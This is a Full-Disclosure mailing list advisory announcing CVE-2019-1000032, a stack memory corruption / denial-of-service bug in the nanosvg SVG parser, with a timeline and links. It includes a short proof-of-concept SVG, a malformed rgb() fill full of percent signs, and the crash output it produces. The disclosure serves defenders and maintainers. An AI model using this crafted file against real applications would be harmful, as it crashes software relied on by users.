| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <babd370b-8df1-b9fa-72f9-888a8b5b2573@0day.work> Date: Sun, 24 Feb 2019 18:37:01 +0100 From: Sebastian Neef <contact@...y.work> To: fulldisclosure@...lists.org Subject: [FD] CVE-2019-1000032: Memory corruption / DoS in nanosvg The SVG library nanosvg [0] suffers from a memory corruption bug that can lead to at least DoS. The bug exists in the `nsvg__parseColorRGB` function, which can be reached by parsing a malicious SVG file through `nsvgParseFromFile` or `nsvgParse`. This should also affect libraries/packages that provide bindings to nanosvg, for example: - Lua: https://github.com/iongion/lunavg - Python: https://github.com/ethanhs/pynanosvg - Java: https://javalibs.com/artifact/org.lwjgl/lwjgl-nanovg - Rust: https://crates.rs/crates/nsvg More information available in the issue [1] and the blogpost [2]. # PoC > <svg> > <circle fill="rgb(0%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%)"/> > </svg> > $> ./test poc.svg > *** stack smashing detected ***: <unknown> terminated > fish: “./test poc.svg” terminated by signal SIGABRT (Abort) # Timeline - Late 2018 bug discovered by Sebastian Neef using AFL - 16th Nov 2018 opened issue [1] - 19th Feb 2019 CVE assigned by DWF - 24th Feb 2019 blogpost [2] and email published [0] https://github.com/memononen/nanosvg [1] https://github.com/memononen/nanosvg/issues/136 [2] https://0day.work/cve-2019-1000032-memory-corruption-in-nanosvg/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists